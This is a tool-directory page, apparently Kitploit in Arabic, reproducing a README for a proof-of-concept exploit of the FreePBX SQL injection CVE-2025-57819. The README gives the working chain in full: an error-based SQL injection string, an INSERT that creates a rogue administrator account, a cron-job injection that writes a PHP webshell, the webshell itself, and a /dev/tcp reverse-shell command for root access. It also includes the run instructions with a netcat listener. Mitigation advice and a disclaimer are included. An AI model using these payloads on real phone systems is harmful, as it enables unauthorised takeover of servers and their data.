Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jazztherabbit/freepbx-sqli-rce
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمتطوير الحمولات
GitHubjazztherabbit/freepbx-sqli-rce

FreePBX-SQLi-RCE

CVE-2025-57819 FreePBX SQLi RCE PoC

عرض المستودع
15منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

FreePBX CVE-2025-57819 - إثبات مفهوم (PoC) لاستغلال حقن SQL غير مصادَق عليه للوصول إلى تنفيذ كود عن بُعد (RCE)

Python License

للأغراض التعليمية والبحث الأمني فقط - راجع الإشعار القانوني أدناه

إثبات مفهوم (PoC) لاستغلال CVE-2025-57819، وهي ثغرة حرجة من نوع حقن SQL غير مصادَق عليها في FreePBX تتيح تنفيذ كود عن بُعد. يُنشر هذا الـ PoC بعد إصدار التصحيحات الرسمية لأغراض البحث الأمني والاختبار المصرّح به فقط.

نظرة عامة

إصدارات FreePBX 15.x و16.x و17.x (الأقل من الإصدارات المصحّحة) عرضة لثغرة حقن SQL غير مصادَق عليها في معالج AJAX الخاص بوحدة endpoint. تتيح سلسلة الاستغلال هذه:

  1. إنشاء حسابات إدارية عبر حقن SQL
  2. نشر قشرة ويب (webshell) عبر حقن مهام cron بمصادقة
  3. رفع الصلاحيات إلى root (إذا كان incron متاحًا) عبر سلسلة خطافات sysadmin_manager
  4. اختراق كامل للنظام مع الوصول إلى قشرة عكسية (reverse shell)

تفاصيل الثغرة

CVE IDCVE-2025-57819
النوعحقن SQL غير مصادَق عليه (قائم على الأخطاء - Error-based)
CVSS9.8 / 10.0 (حرجة)
الإصدارات المتأثرةFreePBX 15 < 15.0.66, 16 < 16.0.89, 17 < 17.0.3
الإصدارات المصحّحة15.0.66, 16.0.89, 17.0.3+
CISA KEVنعم (29 أغسطس 2025)

نقطة النهاية المتأثرة

GET /admin/ajax.php?brand=<PAYLOAD>

تقبل المعامل brand في معالج AJAX الخاص بوحدة endpoint مدخلات المستخدم دون أي تحقق، مما يؤدي إلى حقن SQL قائم على الأخطاء (error-based).


سلسلة الاستغلال

المرحلة 1: حقن SQL وإنشاء حساب إداري

تحقق من SQLi باستخدام استخراج قائم على الأخطاء عبر EXTRACTVALUE() لتسريب اسم قاعدة البيانات:

x' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT DATABASE()),0x7e))-- -

أدخل مستخدمًا إداريًا جديدًا في asterisk.ampusers:

INSERT INTO ampusers (username, password_hash, admin) 
VALUES ('pbx_xxxxxxxx', '<MD5_HASH>', 1)

المرحلة 2: حقن مهام cron بمصادقة

باستخدام بيانات اعتماد إدارية صالحة، يوثّق الاستغلال الدخول إلى FreePBX وينشئ جلسة مصادقًا عليها. يتم حفظ ملفات تعريف الارتباط (cookies) الخاصة بالجلسة واستخدامها في جميع الطلبات اللاحقة المصادق عليها.

حقن أمر قشرة الويب في asterisk.cron_jobs:

INSERT INTO cron_jobs (modulename, jobname, command, class, schedule, max_runtime, enabled, execution_order)
VALUES ('sysadmin', 'wx', 'echo <BASE64_WEBSHELL>|base64 -d >/var/www/html/shell.php', NULL, '* * * * *', 30, 1, 1)

ينفّذ مُشغّل cron في FreePBX الأمر بصلاحيات مستخدم asterisk، ليضع قشرة ويب PHP (webshell) على النظام.

المرحلة 3: تفعيل قشرة الويب

يتم نشر قشرة ويب PHP في /var/www/html/shell.php:

<?php system($_GET['cmd']); ?>

يستقصي الاستغلال قشرة الويب دوريًا حتى يتم تفعيلها، محققًا تنفيذ كود عن بُعد (RCE) بصلاحيات مستخدم asterisk (uid=999).

المرحلة 4: رفع الصلاحيات (شرطي)

إذا تم تكوين incron على الهدف:

  1. إنشاء ملف مُشغِّل (trigger) في /var/spool/asterisk/incron/
  2. incrond (الذي يعمل بصلاحيات root) يكتشف إنشاء الملف
  3. يستدعي /usr/bin/sysadmin_manager مع اسم ملف المشغِّل
  4. يتحقق sysadmin_manager من توقيع GPG ويوجّه الطلب إلى خطاف fwconsole-commands
  5. يفكّ الخطاف الحمولة وينفّذ: /usr/sbin/fwconsole <COMMAND>
  6. حقن أوامر: help; bash -i >& /dev/tcp/LHOST/LPORT 0>&1

النتيجة: الحصول على قشرة root على مستمع القشرة العكسية (إذا كان incron متاحًا).


ما الذي يتم استغلاله

  • عدم وجود تحقق من المدخلات في المعامل brand
  • تنفيذ الاستعلامات المكدّسة (stacked queries) يتيح التلاعب بقاعدة البيانات
  • جدول asterisk.cron_jobs القابل للكتابة ينفذ الأوامر بصلاحيات asterisk
  • الحفاظ على الجلسة المصادق عليها عبر ملفات تعريف الارتباط الخاصة بالحساب الإداري المُنشأ
  • مراقبة نظام الملفات عبر incron والتي تعمل بصلاحيات root
  • تنفيذ خطاف fwconsole دون تحقق مع حقن أوامر

التثبيت

git clone https://github.com/JazzTheRabbit/cve-2025-57819.git
cd cve-2025-57819
pip3 install requests
chmod +x JTR-CVE-2025-57819.py

الاستخدام

# إعداد مستمع Netcat
nc -lvnp <Listener Port>

# تشغيل الاستغلال
python3 JTR-CVE-2025-57819.py <TARGET_IP> <YOUR_IP> <PORT>

إثبات المفهوم (PoC)

لقطة شاشة لـ PoC


الإصدارات المتأثرة

الإصدارالحالة
15.0.0 - 15.0.65قابل للاختراق
15.0.66+مصحّح
16.0.0 - 16.0.88قابل للاختراق
16.0.89+مصحّح
17.0.0 - 17.0.2قابل للاختراق
17.0.3+مصحّح

التخفيف

إجراءات فورية:

  • تقييد الوصول إلى /admin/ajax.php من الشبكات غير الموثوقة
  • عطّل incron إذا لم تكن بحاجة إليه: systemctl disable incrond

إجراءات دائمة: قم بالترقية إلى الإصدارات المصحّحة: 15.0.66+ أو 16.0.89+ أو 17.0.3+


المراجع

  • CVE-2025-57819
  • CISA KEV Catalog
  • FreePBX Security Advisory

إشعار قانوني

⚠️ إخلاء المسؤولية

يُقدَّم إثبات المفهوم هذا لأغراض الاختبار الأمني المصرّح به والتعليم فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه الأداة.

يجب عليك الامتثال لـ:

  • قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) والقوانين المماثلة في نطاق سلطتك القضائية
  • اختبار الأنظمة التي تملكها أو التي لديك ترخيص كتابي صريح لاختبارها فقط
  • الحصول على إذن كتابي قبل أي اختبار أمني
  • ممارسات الإفصاح المسؤول
  • لوائح الخصوصية وحماية البيانات (GDPR وCCPA وما إلى ذلك)

الاستخدامات المحظورة:

  • الوصول غير المصرّح به إلى أنظمة الحاسوب
  • اختبار الاختراق دون موافقة كتابية
  • تعطيل الخدمات أو سرقة البيانات
  • أي نشاط ضار أو غير قانوني

تنازل عن المسؤولية: المؤلف غير مسؤول عن:

  • الوصول غير المصرّح به أو التهم الجنائية
  • الأضرار التي تلحق بالأنظمة أو فقدان البيانات
  • العواقب القانونية لإساءة الاستخدام
  • انتهاكات قوانين الاحتيال الحاسوبي

هذه الثغرة:

  • تم الإفصاح عنها علنًا (CVE-2025-57819)
  • التصحيحات متاحة للعموم
  • نُشرت لأغراض البحث الأمني فقط
  • تمت مشاركتها بمسؤولية بعد إصدار التصحيح

المؤلف

JazzTheRabbit

  • GitHub: @JazzTheRabbit
  • HackTheBox: @JazzTheRabbit
  • YouTube: JazzTheRabbit

الترخيص

رخصة MIT

تنزيل الأداة